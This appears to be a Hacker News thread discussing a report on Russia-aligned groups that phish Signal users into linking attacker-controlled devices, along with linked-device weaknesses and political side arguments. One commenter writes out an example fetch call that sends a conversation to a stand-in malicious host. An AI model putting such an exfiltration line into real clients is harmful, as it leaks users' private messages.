[HN Gopher] Multiple Russia-aligned threat actors actively targe...
       ___________________________________________________________________
        
       Multiple Russia-aligned threat actors actively targeting Signal
       Messenger
        
       Author : karel-3d
       Score  : 544 points
       Date   : 2025-02-19 14:05 UTC (8 hours ago)
        
 (HTM) web link (cloud.google.com)
 (TXT) w3m dump (cloud.google.com)
        
       | karel-3d wrote:
       | tldr: they mostly use phishing with fake ukrainian army group
       | invites to trick people (from ukrainian army) to link the phone
       | device to a attacker-controlled PC.
       | 
       | Also they try to get the actual database SQL files from Windows
       | devices and Android devices.
        
       | anotherhue wrote:
       | You can check for unexpected linked devices in the settings menu.
        
         | jzb wrote:
         | I wonder if Signal should expose linked devices directly in the
         | UI at all times. Something like a small icon that indicates
         | "You have 3 linked devices active" or similar.
        
           | XorNot wrote:
           | I think the trouble is information overload is a bit of a
           | thing in this case. It's information that is 99% of the time
           | useless, except the one time it isn't. But also, to an
           | informed user is much less of a threat - the threat is anyone
           | you interact with getting compromised.
           | 
           | EDIT: Like an analytics based approach would probably be far
           | more useful - popping up a confirmation for example if GeoIP
           | shows a device is far removed from all the others, which for
           | most people would be true unless they were traveling.
        
           | inor0gu wrote:
           | Would probably lead to notification fatigue.
           | 
           | Showing a big snackbar when a new device is added is probably
           | enough, especially if the app can detect there was no
           | "action" on your phone that triggered it.
           | 
           | Key transparency, once rolled out, would help to ensure there
           | is no lingering "bad" device around, but phishing will always
           | be a problem.
        
             | inetknght wrote:
             | > _Showing a big snackbar when_
             | 
             | A big... what?
             | 
             | Can you tell me what this new lingo is for someone who
             | doesn't use the latest and shittiest marketing lingo?
        
               | inor0gu wrote:
               | > latest and shittiest marketing lingo
               | 
               | It exists since Android 6: https://developer.android.com/
               | reference/com/google/android/m...
               | 
               | Informative banner that does not require user interaction
               | to dismiss.
        
               | saagarjha wrote:
               | It's UI design language: https://developer.android.com/re
               | ference/com/google/android/m...
        
               | SpaghettiCthulu wrote:
               | An in-app notification along the bottom of your screen.
               | Usually just some text on a dark grey or black
               | background.
        
               | dragonwriter wrote:
               | Snackbar isn't a particularly new term, it goes back,
               | IIRC, to the first version of Material Design and is
               | similar to a toast but different in that snackbars may
               | support interaction whereas toasts are non-interactive.
        
         | seb1204 wrote:
         | Great idea, I'll send you a QR code...
        
       | dang wrote:
       | Related: https://www.wired.com/story/russia-signal-qr-code-
       | phishing-a...
       | (https://web.archive.org/web/20250219110740/https://www.wired...,
       | https://archive.ph/MbR9e)
       | 
       | (via https://news.ycombinator.com/item?id=43103692, but no
       | comments there)
        
       | advisedwang wrote:
       | Kind of a good sign for signal's security that this is the best
       | Russia has got!
        
         | yellowapple wrote:
         | Yeah, this just gave me the last nudge I needed to give Signal
         | a go.
        
         | saagarjha wrote:
         | I wouldn't assume that but I also wouldn't recommend against
         | using Signal.
        
       | ge96 wrote:
       | that's nice they provided a list of bad domains
        
       | babypuncher wrote:
       | And at the same time Xitter banned links to Signal's official
       | website. Coincidence?
       | 
       | Evil people don't want us using Signal. All the more reason we
       | _should_ be using Signal.
        
       | untech wrote:
       | It is not plainly stated in the article, but as far as I
       | understand, the first step of one of the attacks is to take the
       | smartphone off a dead soldier's body.
        
         | mmooss wrote:
         | Is this serious?
         | 
         | It raises questions about smartphones being standard equipment
         | for soldiers, but they do give every soldier an effective,
         | powerful computing and communication platform (that they know
         | without additional training).
         | 
         | The question is how to secure them, including against the risk
         | described in the parent. That seems like a high risk to me I
         | would expect someone is working on how to secure them enough
         | that even Russian intelligence doesn't have an effective
         | exploit.
         | 
         | The solutions may apply well to civilian privacy too, if they
         | ever become more widespread. It wouldn't be the worst idea to
         | secure Ukrainian civilian phones against Russian attackers.
        
           | newsclues wrote:
           | Phones aren't secure but are more secure than the standard
           | radios most have access to.
           | 
           | Encrypted milspec comms aren't the standard in a massive war.
           | 
           | It's weird but discord, signal and some mapping apps on
           | smartphones are how this war is being fought.
        
             | dmix wrote:
             | Russians aren't allowed to bring phones on the frontlines
             | apparently but Ukranians often do still as they have the
             | combat management app which is critical to operations. I've
             | always wondered if this is why there's far more published
             | footage of Ukranian combat video than Russian. Beyond the
             | donation incentive they attached to videos when publishing
             | them on Youtube/Telegram.
        
               | newsclues wrote:
               | Where is the fighting, and who runs the cellular networks
               | in that area?
               | 
               | I'd want to run military communications on a network my
               | side controls
        
               | gpderetta wrote:
               | I think a large chunk of the footage is taken by gopros
               | or similar, not smartphones.
               | 
               | And I think a pretty much all published Ukrainian and
               | Russian combat footage is vetted by their respective
               | military (who would want to be court martialed for Reddit
               | karma?).
               | 
               | They just take different approaches to what, when and
               | were to release the footage.
        
               | motorest wrote:
               | > I've always wondered if this is why there's far more
               | published footage of Ukranian combat video than Russian.
               | 
               | I'm sure Russia's meat wave tactics have more of a role.
               | If you're sending your troops in suicide missions,
               | including guys without weapons and even in crutches,
               | you're not exactly too keen in having them carrying
               | mobile phones to document the experience or even, heavens
               | forbid, survive by surrendering.
        
               | merely-unlikely wrote:
               | In the first weeks of the war you could see Russian
               | armored columns clearly on Google Maps as heavy traffic
               | (along with other military activity but the columns
               | really stood out).
               | https://www.theverge.com/2022/2/28/22954426/google-
               | disables-...
        
           | hnlmorg wrote:
           | I seem to recall uploaded selfies being a frequent source of
           | problems. For example: https://www.rferl.org/a/trench-
           | selfies-tracking-russia-milit...
        
         | forkerenok wrote:
         | The article says they phish people into linking adversarial
         | devices to their Signal:
         | 
         | > [...] threat actors have resorted to crafting malicious QR
         | codes that, when scanned, will link a victim's account to an
         | actor-controlled Signal instance. If successful, future
         | messages will be delivered synchronously to both the victim and
         | the threat actor in real-time, [...]
        
           | Austiiiiii wrote:
           | There's a new feature to sync old messages that seems like it
           | could potentially make that attack vector ten times worse:
           | 
           | https://www.bleepingcomputer.com/news/security/signal-
           | will-l...
           | 
           | Would a malicious URL be able to activate this feature as
           | part of the request?
        
             | inor0gu wrote:
             | Probably not, in any normal case a secondary device
             | shouldn't have that kind of authority to dictate.
             | 
             | It is more concerning if the toggle is on by default and
             | then you carelessly press next (on this or some other kind
             | of phish).
        
         | andreygrehov wrote:
         | Soldiers are not allowed to carry a cell phone.
        
           | danesparza wrote:
           | Clearly, some folks didn't get the memo.
           | 
           | https://www.cbc.ca/news/world/russia-troops-cellphone-
           | ukrain...
        
       | casenmgreen wrote:
       | Can't view the article, as I am an evil Tor user.
        
         | marc_abonce wrote:
         | Me too, but I was able to access the article through the
         | Internet Archive:
         | 
         | https://web.archive.org/web/20250219202428/https://cloud.goo...
        
       | lenerdenator wrote:
       | I'd love to have more of my socializing happening on Signal.
       | Anyone got a good way to convince the non-paranoid to use it?
        
         | OsrsNeedsf2P wrote:
         | "Sorry, I only use Signal" has worked nearly a decade for me
        
           | bdangubic wrote:
           | same
        
           | golergka wrote:
           | What if you need to contact someone and they use whatsapp?
        
             | Henchman21 wrote:
             | IME you say "Sorry I only use Signal" and either they
             | change or you don't get in contact with that person.
             | 
             | If you change and abandon your principles were they really
             | principles in the first place?
        
               | golergka wrote:
               | How do you tell that to them in the first place? You got
               | someone's phone number. The person who gives it to you
               | tells them that they use whatsapp. You can't even tell
               | them "Sorry I only use Signal" unless you open whatsapp
               | app.
        
               | basisword wrote:
               | You realise you could use that phone number to...call
               | them and let them know? Also - in what situation are they
               | giving you a phone number and telling you they use
               | WhatsApp but you having no way to respond when receiving
               | that info? If it's in person you can explain at the time.
               | If it's taken from a website, call them. Or you can even
               | fall back on SMS.
        
               | prmoustache wrote:
               | If they can't reach you via whatsapp, they will call you.
        
               | kelnos wrote:
               | Presumably at the time they've given you their phone
               | number, they've told you that they are on WhatsApp, and
               | then you've responded directly that you're only on
               | Signal.
               | 
               | If there is a communications channel by which they can
               | give you their phone number, you can use that same
               | channel to discuss what messenger to use.
        
             | root_axis wrote:
             | RCS?
        
             | croes wrote:
             | What if they want to contact you and you use Signal?
        
               | jisnsm wrote:
               | Luckily, with the technological advances in the last
               | months, it is now possible to install more than one app
               | on a phone at a time.
        
               | maigret wrote:
               | It is also possible to communicate without using Meta
               | services.
        
               | tumsfestival wrote:
               | Good luck with that depending on where you live.
        
               | accrual wrote:
               | And _when_ you live. The 20s-30s year old crowd I
               | interact with seems to avoid, if not mock FB. I recognize
               | it has its uses and benefits, though.
        
               | jisnsm wrote:
               | They mock fb whilst they use instagram and WhatsApp.
        
               | inetknght wrote:
               | > _it is now possible to install more than one app on a
               | phone at a time._
               | 
               | And, in doing so, achieve the security posture of the
               | worse of the apps!
        
             | immibis wrote:
             | If you really really really need to? You use Whatsapp.
             | 
             | If you don't _need_ to? You tell them to get Signal.
        
             | ycombinatrix wrote:
             | Not GP - I tolerate Whatsapp but I draw the line at SMS.
        
               | tremon wrote:
               | For me it's the other way around: I tolerate SMS but I
               | draw the line at Whatsapp.
        
             | Fnoord wrote:
             | You call them. Or use SMS. Or use e-mail.
        
           | echelon_musk wrote:
           | Virtue Signalling!
        
             | throwawayq3423 wrote:
             | Which is bad, how?
        
               | potato3732842 wrote:
               | It's a joke, because virtue signaling (or whatever name
               | you want to give it) is bad, but Signal the messenger app
               | is good so it's a play on words.
        
               | heyloolma wrote:
               | It's not bad. It just IS.
               | 
               | the only people that think it is bad are people who have
               | a different opinion and feel attacked for whatever
               | reason. I find it telling when people accuse others of
               | virtue signaling because it is almost always someone who
               | is jealous or insecure attacking said signaler.
        
               | DFHippie wrote:
               | "Virtue signaling" in theory means "talking the talk
               | without walking the walk", but it's generally thrown out
               | by people who make no effort to assess whether the person
               | criticized is walking the walk or even in contradiction
               | of such evidence.
               | 
               | Driving an economically efficient car -- choosing any
               | sort of car -- has enormous consequences on one's life,
               | for example. Choosing to by a particular car isn't a
               | decision made lightly. But Prius drivers back in the day
               | were accused of virtue signaling, as though the Prius
               | were equivalent to a temporary tattoo.
               | 
               | In fact, speaking of temporary tattoos, simply having a
               | bumper sticker advocating for animal rights, say, belief
               | in anthropogenic climate change, or peace in the Middle
               | East will expose one to regular displays of hostility and
               | aggression, so it isn't a cheap signal.
               | 
               | In other words, in my experience your observation is spot
               | on.
        
               | root_axis wrote:
               | > _" Virtue signaling" in theory means "talking the talk
               | without walking the walk"_
               | 
               | Virtue signaling means sending deliberate signals about
               | your virtues, whether you "walk the walk" or not. People
               | are often critiqued for going to uncomfortable lengths to
               | signal their virtues, but something as simple as a "meat
               | is murder" shirt or a MAGA hat is also virtue signaling.
        
         | tapoxi wrote:
         | My (non-technical) Mom actually got my whole extended family on
         | Signal with a group link. Since there's no real account
         | creation it was painless. It's how we do all video calls/photo
         | sharing/chat now.
        
         | Mistletoe wrote:
         | Just explain what end to end encryption means. People are
         | starting to get it and don't want companies able to read their
         | messages.
        
           | mikedelfino wrote:
           | Isn't WhatsApp end-to-end encrypted?
        
             | mmooss wrote:
             | I thought they recorded the metadata - who talks to who and
             | when. (For the uninitiated, that is as valuable or more
             | valuable than the message contents.)
        
               | inor0gu wrote:
               | you also send them your contacts in plaintext so you can
               | find who's also on WhatsApp; signal doesn't
        
             | FergusArgyll wrote:
             | Yes it is, they actually use the signal protocol,[0] but
             | they collect metadata which Signal supposedly doesn't (you
             | can't _really_ know)
             | 
             | [0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=S
             | evera...
        
               | inor0gu wrote:
               | Signal doesn't collect that data, but you have no reason
               | to trust me on it.
               | 
               | Look at what data they can provide to governments when
               | compelled by law: https://signal.org/bigbrother/
        
           | baq wrote:
           | Nobody cares about this unless they deal drugs or something.
           | 
           | What some people care about is not giving all their private
           | conversations to masculine energy zuck - but don't expect any
           | major wins.
        
             | retrochameleon wrote:
             | Awful shortsighted and uninformed viewpoint that has been
             | beaten into the ground ad nauseum.
             | 
             | Read a couple books. Privacy is a precondition to
             | democracy.
        
               | baq wrote:
               | It isn't a viewpoint. It's a fact. I'm using signal for
               | almost a decade now and only managed to get a dozen or so
               | people to use it in any capacity. Most keep using
               | whatsapp as their primary method of communication anyway.
        
               | monadINtop wrote:
               | >Read a couple books
               | 
               | Maybe you should? It might help improve your reading
               | comprehension. The person you're responding to said that
               | most normal people don't care enough to switch to a
               | vastly less popular app, which is obviously true.
        
               | lukan wrote:
               | What books would you recommend, that proof that
               | connection?
               | 
               | "Privacy is a precondition to democracy"
        
               | esafak wrote:
               | How would you convert an autocracy into a democracy
               | without secrecy? There are no peaceful means so you have
               | to plot.
        
               | lukan wrote:
               | Secrecy and privacy is not really the same concept.
        
           | subjectsigma wrote:
           | My Signal experience: ex gf in college asks what app I'm
           | using to text. Tell her it's Signal, E2EE, messages are only
           | stored on her phone and nobody else can read them. She says
           | cool and downloads the app. Four months later her phone
           | breaks.
           | 
           | "Hey subjectsigma I got my new phone today. Where are all my
           | messages?"
           | 
           | "... Do you have your old phone? That's the only place they
           | are."
           | 
           | "No? Last time I got a new phone WhatsApp moved my messages
           | over, and WA is E2EE so I thought it worked the same way."
           | 
           | "Nope if you don't have a backup or your old phone they're
           | gone. Sorry."
           | 
           | "This is bullshit. Why does anyone use Signal. I can't
           | believe it deleted all my messages. I'm uninstalling it. Etc
           | etc."
           | 
           | We have a long way to go, my friend.
        
             | noAnswer wrote:
             | It only works for WhatsApp if you have Backup to Google
             | activated[1]. I once tried to work with backuped files from
             | my old phone and it didn't work. (Older tutorials indicated
             | that it once worked, though.)
             | 
             | [1] There was a time WhatsApp had a nag-screen if you
             | hadn't Backup to Google activated. So I guess most people
             | would have eventually caved.
        
               | tremon wrote:
               | That nag-screen is still there, it pops up roughly every
               | three months for me (though not on my primary phone,
               | Whatsapp won't get anywhere near that one).
        
         | miggol wrote:
         | Group stories are great fun and a feature I seriously miss on
         | Whatsapp. They work well from meme chats to family groups.
         | 
         | There being a killer feature that Whatsapp users are missing
         | out on won't convince everyone but it sure makes me feel less
         | like a nerd when encouraging the switch to Signal.
         | 
         | I find it quite funny that such an obvious feature likely
         | hasn't been added to Whatsapp yet because Meta thinks Instagram
         | is for stories. That's pure speculation on my part though
        
         | mmooss wrote:
         | I helped an especially non-technical user install Signal and
         | they didn't need my help at all. They were using it in a minute
         | - download from the app store, transcribe a code from a text
         | message, and you're in - and it worked just like legacy text
         | and phone.
         | 
         | I'd tell them that - just download it and you'll be texting me
         | in a minute, and now nobody is tracking everyone you talk to.
        
           | imglorp wrote:
           | To be clear, someone will/can track WHO you talk to. Right?
        
             | mmooss wrote:
             | My understanding is that they can/do on WhatsApp.
             | 
             | On Signal, unless there is a some bug or outright fraud,
             | afaik they cannot - that is one of their fundamental goals,
             | and they did a lot of work to develop communication
             | technology that worked without revealing that metadata.
             | 
             | (Of course, if someone gets access to your phone, then they
             | know who you are talking to.)
        
             | seb1204 wrote:
             | That kind of meta data is not stored by signal as far as I
             | know. But yes, data stream between two end points can be
             | linked to communicating with each other.
        
         | lcc wrote:
         | I've had good luck just asking for it, even with group chats
         | (though admittedly my friends are mostly technical and more
         | privacy conscious than the average person). Usually it's a
         | switch from FB Messenger and I just say that I don't want to be
         | locked into Facebook anymore.
        
         | rakoo wrote:
         | Take time with the people to do the boring stuff on their
         | phone/computer:
         | 
         | - install [the thing]
         | 
         | - start it, show how it works
         | 
         | - search for yourself, start a convo, exchange messages
         | 
         | - add them to the group
         | 
         | IME the friction comes from having to do the first step,
         | because it's really an annoyance no one cares about, so if you
         | take it for yourself and do it they'll like that
        
         | MillironX wrote:
         | I usually tell people, "It's like iMessage, but it works on
         | iPhone and Android," or "Hey, if you download Signal we can
         | send high-quality photos between Android and iPhone."
        
       | p2detar wrote:
       | Last week it was Microsoft, now Signal, who's next?
       | 
       | https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
        
         | snailmailstare wrote:
         | I hate to break it to you, but threat actors aligned with any
         | major state are targeting everything with an Internet presence
         | all of the time.
        
       | 8bithero wrote:
       | So a few days ago Elon Musk blocked all links to Signal from the
       | X platform and now this... Could be a coincidence but the timing
       | sure is sus.
        
         | rpastuszak wrote:
         | I'm not going to psychoanalyse the brain parasite, but I
         | imagine that the reason to do it could be as petty as shadow
         | banning people with Fediverse (e.g. mastodon) handles in their
         | bios shortly after he took over.
         | 
         | Also:
         | 
         | > Signal has been a primary method of communication for federal
         | workers looking to blow the whistle on DOGE. > from
         | https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...
         | 
         | Btw, I don't live in the US but I sketched a simple tool to
         | prevent X from censoring Signal.me links: https://link-in-a-
         | box.vercel.app
        
         | master-lincoln wrote:
         | Only signal.me links were blocked as far as I understood. Other
         | signal links kept working. (I have no first hand knowledge as I
         | left Twitter when the owner changed)
        
         | willy_k wrote:
         | Not really, the domain block was reportedly due to increased
         | spam activity from that domain and performed automatically, so
         | it would follow that a write up would come a few days later.
         | That is if they are related, which is not a given.
        
           | immibis wrote:
           | Musk calls everything he doesn't like "spam", so of course it
           | was.
        
         | inor0gu wrote:
         | Unrelated most likely, signal.me is a legitimate domain used by
         | Signal. Doubt twitter is so on top of Threat Analysis when they
         | fumbled their own redirects from twitter.com to x.com for a
         | while.
        
       | vetrom wrote:
       | Signal (and basically any app) with a linked devices workflow has
       | been risky for awhile now. I touched on this last year
       | (https://news.ycombinator.com/context?id=40303736) when Telegram
       | was trash talking Signal -- and its implementation of linked
       | devices has been problematic for a long time:
       | https://eprint.iacr.org/2021/626.pdf.
       | 
       | I'm only surprised it took this long for an in-the-wild attack to
       | appear in open literature.
       | 
       | It certainly doesn't help that signal themselves have discounted
       | this attack (quoted from the iacr eprint paper):
       | "We disclosed our findings to the Signal organization on October
       | 20, 2020, and received an answer on October 28, 2020. In summary,
       | they state that they do not treat a compromise of long-term
       | secrets as part of their adversarial model"
        
         | diputsmonro wrote:
         | If I'm reading that right, the attack assumes the attacker has
         | (among other things) a private key (IK) stored only on the
         | user's device, and the user's password.
         | 
         | Thus, engaging on this attack would seem to require hardware
         | access to one of the victims' devices (or some other backdoor),
         | in which case you've already lost.
         | 
         | Correct me if I'm wrong, but that doesn't seem particularly
         | dangerous to me? As always, security of your physical hardware
         | (and not falling for phishing attacks) is paramount.
        
           | josh2600 wrote:
           | This is my read as well. Just double clicking here.
        
           | vetrom wrote:
           | No, it means that if you approve a device to link, and you
           | later have reason to unlink the device, you can't establish
           | absolutely that the unlinked device can no longer access
           | messages, or decrypt messages involving an account, breaking
           | the forward-secrecy guarantees.
           | 
           | That leaves you with the only remedy for a signal account
           | that has accepted a link to a 'bad device' being to burn the
           | whole account. (maybe rotating safety numbers/keys would be
           | sufficient, i am uncertain there) -- If you can prove the
           | malicious link was _only_ a link, then yeah, the attack i
           | described is incomplete, but the issues in general with
           | linked devices and remedies described are the important bits,
           | I think.
        
             | inor0gu wrote:
             | That's not what the attack does tho - they have access to
             | your private key so they can complete the linking protocol
             | without your phone and add as many devices as they want (up
             | to the allowed limit). If you add a bad device, you are
             | screwed from that moment on, assuming you don't sync your
             | chat history.
             | 
             | You can always see how many devices a user has: they have a
             | unique integer id so if I wanna send you a message, I
             | generate a new encrypted version for each device. If the UI
             | does not show your devices properly than that is an
             | oversight for sure, but I don't think it's the case
             | anymore.
             | 
             | Either way, you'd have to trust that the Signal server is
             | honest and tells you about all your devices. To avoid that,
             | you need proofs that every Signal user has the save view on
             | your account (keys), which is why key transparency is such
             | an important feature.
        
             | UltraSane wrote:
             | That is really quite bad.
        
           | reactordev wrote:
           | "Just install this chrome browser extension" is all it takes
           | now. Hell, you can even access cookies and previously visited
           | sites from within the browser. All it takes is some funky ad,
           | or chrome extension, or some llama-powered toolbar to gain
           | access to be able to do exactly that.
           | 
           | Background services on devices has been a thing for a while
           | too. Install an app (which you grant all permissions to when
           | asked) and bam, a self-restarting daemon service tracking
           | your location, search history, photos, contacts, notes,
           | email, etc
        
             | noname120 wrote:
             | How is that related in any way to Signal?
        
               | reactordev wrote:
               | My point is that anything you install on your device is a
               | vector. Can install MITM attacks. Can read your data,
               | etc. Sidecar attacks.
        
           | vlovich123 wrote:
           | It sounds like all that's needed is a device that had been
           | linked in the past. Unlinking doesn't have the security
           | requirements you'd think it would and there's a phishing
           | attack to make scanning a QR code trigger a device link
           | (which seems really really bad if the user doesn't even have
           | to take much action)
        
             | inor0gu wrote:
             | Your phone (primary device) and the linked ones have to
             | share the IK since that is the "root of trust" for you
             | account: with that you generate new device keys, renew them
             | and so on.
             | 
             | Those keys are backed by Keystore on Android, and some
             | similar system on Windows/Linux, i'd assume the same for
             | MacOS/iOS (but I don't know the details) so it's not as
             | simple as just having access to your laptop, they'd need at
             | least root.
             | 
             | Phishing is always tricky, probably impossible to counter
             | sadly - each one of us would be susceptible at the wrong
             | moment.
        
         | inor0gu wrote:
         | The attack in that paper assumes you have compromised the
         | user's long term private identity key (IK) which is used to
         | derive all the other keys in the signal protocol.
         | 
         | Outside of lab settings, the only way to do that is: - (1) you
         | get root access to the user's device - (2) you compromise a
         | recent chat backup
         | 
         | The campaign Google found is akin to phishing, so not as
         | problematic on a technical level. How do you warn someone they
         | might be doing something dangerous in an entire can of worms in
         | Usable Security... but it's gonna become even more relevant for
         | Signal once adding a new linked device will also copy your
         | message history (and last 45 days of attachments).
        
       | 1970-01-01 wrote:
       | The good news is the target is targeted for a reason: it's still
       | effective.
        
       | lovegrenoble wrote:
       | Highly likely...
        
       | andreygrehov wrote:
       | They provided some domains, but not all of them are taken. For
       | example, signal-protect[.]host is available, kropyva[.]site is
       | available, signal-confirm[.]site is registered in Ukraine. Some
       | of them are registered in Russia.
       | 
       | Never trust a country at war--any side. Party A blames B, Party B
       | blames A, but both have their own agenda.
        
         | nightpool wrote:
         | An unregistered domain can still be an IoC especially when
         | found through e.g. payload analysis.
        
         | dtquad wrote:
         | >signal-confirm[.]site is registered in Ukraine
         | 
         | The WHOIS is usually fake made up data so don't know why you
         | are using that to claim it's registered in Ukraine. Russia is
         | also known to use stolen credentials, SIM cards etc. from their
         | neighbouring countries, including Ukraine, for things like
         | this.
        
           | andreygrehov wrote:
           | Then why should I trust the article at all? If WHOIS data is
           | fake and stolen credentials are common (which I don't
           | disagree with), I could register a domain, put your name on
           | it, and make it look like you're behind the phishing. Would
           | that make it true? After all, in war, deception is a
           | legitimate tactic.
        
         | XorNot wrote:
         | How about not being so stupid as to assume that nation-state
         | level threat actors would be completely unable to register
         | domains in other countries, and that this would _obviously_ be
         | how there well funded scheme is cracked by you, Very Smart
         | Citizen looking at publicly available information?
         | 
         | This would have to be the most braindead take I can imagine: my
         | personal domain _is a US domain_ and I 'm not a US citizen.
        
         | WesolyKubeczek wrote:
         | I believe you are making a mistake by thinking that since a
         | malicious actor's domain is registered in Ukraine, it
         | automatically must be doing something in the interests of
         | Ukraine, or at least be known to its officials.
         | 
         | Lots of Russian state actors have no problems working from
         | within Ukraine, alas. Add to this purely chaotic criminal
         | actors who will go with the highest bidder, territories
         | temporarily controlled by Russians that have people shuttle to
         | Ukraine and back daily, and it becomes complicated very
         | quickly.
        
           | andreygrehov wrote:
           | Fair point. Just because a domain is registered in Ukraine
           | doesn't mean it's acting in Ukraine's interests. But that
           | works both ways. If Russian actors can operate from Ukraine,
           | then Ukrainian actors (or others) can also operate from
           | Russia, or at least make it look that way. Cyber attacks
           | originating from Ukraine and targeting Russia aren't uncommon
           | either, which only adds to the complexity of attribution.
           | 
           | The issue isn't just attribution but also affiliation. When
           | similar attacks come from Ukraine targeting Russia, Google
           | stays quiet. I understand that Russia invaded Ukraine, not
           | the other way around, but given the complexity of the
           | conflict, aligning with one side in cyber warfare reporting
           | is a questionable move. At the end of the day, attacks will
           | come from both sides - it's a war, after all.
           | 
           | Edit: when I say 'questionable move', I'm specifically
           | referring to Google. It's unclear what they were trying to
           | achieve with this article, is it a political statement or
           | just a marketing piece showcasing how good GTIG is? Or both?
        
         | TheSpiceIsLife wrote:
         | Oceania had always been at war with Eastasia.
        
       | whatever1 wrote:
       | Impossible these are our newly minted allies
        
         | balozi wrote:
         | New allies, same as the old allies.
        
       | 4ndrewl wrote:
       | "Russia-aligned threat actors" has a whole new meaning this last
       | week.
        
         | josefresco wrote:
         | Indeed. It now potentially includes a _very long list_ of
         | Americans.
        
           | user3939382 wrote:
           | What does that mean?
        
             | chinathrow wrote:
             | Trump and his voters.
        
         | davidw wrote:
         | I wonder if someone in the US will declare that, actually,
         | Signal is actively targeting the Russia-aligned threat actors.
        
           | morkalork wrote:
           | Or that Signal shouldn't have started it in the first place
        
       | adultSwim wrote:
       | Is this why twitter has been blocking signal.me links?
       | https://news.ycombinator.com/item?id=43076710
        
         | inor0gu wrote:
         | Unrelated most likely, signal.me is a legitimate domain used by
         | Signal. Doubt twitter is so on top of Threat Analysis when they
         | fumbled their own redirects from twitter.com to x.com for a
         | while.
        
       | chinathrow wrote:
       | Russia fucking up the worlds stuff this decade will be the
       | material for history books. The are actively breaking Europe and
       | almost noone seems to care.
        
         | amelius wrote:
         | Second will be how the internet with social media like
         | twitter/x destroyed our democracy.
        
         | FpUser wrote:
         | If Europe is what it claims to be: an enlightened democracy
         | with progressive intelligent populace it can not be broken by
         | demented crap messages from twitter.
         | 
         | If however it is fucked up and on a brink of collapse then
         | sure. Little nudge can steer it into "right" direction. but
         | then who is guilty in a first place.
        
           | chinathrow wrote:
           | You should read up on how russian money buys influenve, eg.
           | In Moldavia.
        
       | josh2600 wrote:
       | There are many voices which try to tell you that signal is
       | compromised. Notice that all of those voices have less open-
       | source-ness than Signal in virtually all cases.
       | 
       | Signal is doing its best to be a web scale company and also
       | defend human rights. Individual dignity matters.
       | 
       | This is not a simple conversation.
        
         | mmooss wrote:
         | Also, it's a tricky environment of disinformation generally,
         | and in particular for anything valuable like Signal. If Signal
         | is secure, attackers on privacy would want people to believe
         | Signal is compromised and to use something else. If it's not,
         | then they would want people to believe Signal is secure.
         | 
         | I think the solution is to completely ignore any potential
         | disinfo source, especially random people on social media
         | (including HN). It's hard to do when that's where the social
         | center is - you have to exclude yourself. Restrict yourself to
         | legitimate, trusted voices.
        
           | inor0gu wrote:
           | I would also read it from another perspective. Attackers,
           | especially at the level of nation states, will always try to
           | get as many avenues for achieving their goals as possible.
           | 
           | If you have compromised a service, it would be in your
           | interest to make it more popular (assuming you think you are
           | the only one in possession of it).
           | 
           | If you cannot, you don't give up; you just go back to the
           | drawing board (https://xkcd.com/538/). Maybe I don't need to
           | break Signal if I can just rely on phishing or scare tactics
           | to get what I want.
        
         | moffkalast wrote:
         | > web scale
         | 
         | I didn't realize anyone still used that term with a straight
         | face.
         | 
         | "MongoDB is web scale, you turn it on and it scales right up."
        
       | evilfred wrote:
       | "Russia-aligned threat"... so... the US?
        
       | BrenBarn wrote:
       | Is this suggesting that a single QR scan can on its own perform
       | the device linking? If so, it seems like that's kind of the hole
       | here, right? Like you shouldn't be able to scan a code that on
       | its own links the device; you should have to manually confirm
       | with like "Yes I want to link to this device". And then if you
       | thought you were scanning a group invite code you'd realize you
       | weren't. (Yeah, you'd still have to realize that, but I think
       | it's a meaningful step up over just "you scanned a code to join a
       | group and instead it silently linked a different device".)
        
         | mmooss wrote:
         | > you should have to manually confirm with like "Yes I want to
         | link to this device". And then if you thought you were scanning
         | a group invite code you'd realize you weren't. (Yeah, you'd
         | still have to realize that, but I think it's a meaningful step
         | up over just "you scanned a code to join a group and instead it
         | silently linked a different device".)
         | 
         | Remember that Signal is designed for non-technical users.
         | Many/most do not understand QR codes, links, linking, etc, and
         | they do not think much about it. They take an immediate,
         | instinctive guess and click on something - often to get it off
         | the screen so they can go back to what they were doing.
         | 
         | Do you have reason to think there is not confirmation? Maybe
         | Signal's documentation will tell you.
        
       | Yeul wrote:
       | Honestly don't use Signal for privacy or anonymity. I switched to
       | it because it is not owned by a sycophant of Trump.
       | 
       | Oh how Americans make fun of the CCP but watching all the tech
       | bros bend the knee was embarrassing.
        
       | paganel wrote:
       | Alphabet is working in tandem with the Ukrainian SBU? Interesting
       | choice, just as the US President has called Zelensky a dictator
       | (and for good reason, Poroshenko, the previous Ukrainian
       | president, has basically said the same thing a few days ago). I
       | wonder how long the Alphabet higher-ups will allow this thing to
       | unfold, or maybe they're not so good at reading the geopolitical
       | tea leaves.
        
       | parhamn wrote:
       | One thing I'm realizing more and more (I've been building an
       | encrypted AI chat service which is powered by encrypted CRDTs) is
       | that "E2E encryption" really requires the client to be built and
       | verified by the end user. I mean end of the day you can put a
       | one-line fetch/analytics-tracker/etc on the rendering side and
       | everything your protocol claimed to do becomes useless. That even
       | goes further to the OS that the rendering is done on.
       | 
       | The last bit adds an interesting facet, even if you manage to
       | open source the client and manage to make it verifiably buildable
       | by the user, you still need to distribute it on the iOS store.
       | Anything can happen in the publish process. I use iOS as the
       | example because its particularly tricky to load your own build of
       | an application.
       | 
       | And then if you did that, you still need to do it all on the
       | other side of the chat too, assuming its a multi party chat.
       | 
       | You can have every cute protocol known to man, best encryption
       | algorithms on the wire, etc but end of the day its all trust.
       | 
       | I mention this because these days I worry more that using
       | something like signal actually makes you a target for snooping
       | under the false guise that you are in a totally secure
       | environment. If I were a government agency with intent to snoop
       | I'd focus my resources on Signal users, they have the most to
       | hide.
       | 
       | Sometimes it all feels pointless (besides encrypted storage).
       | 
       | I also feel weird that the bulk of the discussion is on
       | hypothetical validity of a security protocol usually focused on
       | the maths, when all of that can be subverted with a
       | fetch("https://malvevolentactor.com", {body:
       | JSON.stringify(convo)}) at the rendering layer. Anyone have any
       | thoughts on this?
        
         | inor0gu wrote:
         | You will always have to root your trust in something, assuming
         | you cannot control the entire pipeline from the sand that
         | becomes the CPU silicone, through the OS and all the way to how
         | packets are forwarded from you to the person on the other end.
         | 
         | This makes that entire goal moot; eliminating trust thus seems
         | impossible, you're just shifting around the things you're
         | willing to trust, or hide them behind an abstraction.
         | 
         | I think what will become more important is to have enough
         | mechanisms to be able to categorically prove if an entity you
         | trust to a certain extent is acting maliciously, and hold them
         | accountable. If economic incentives are not enough to trust a
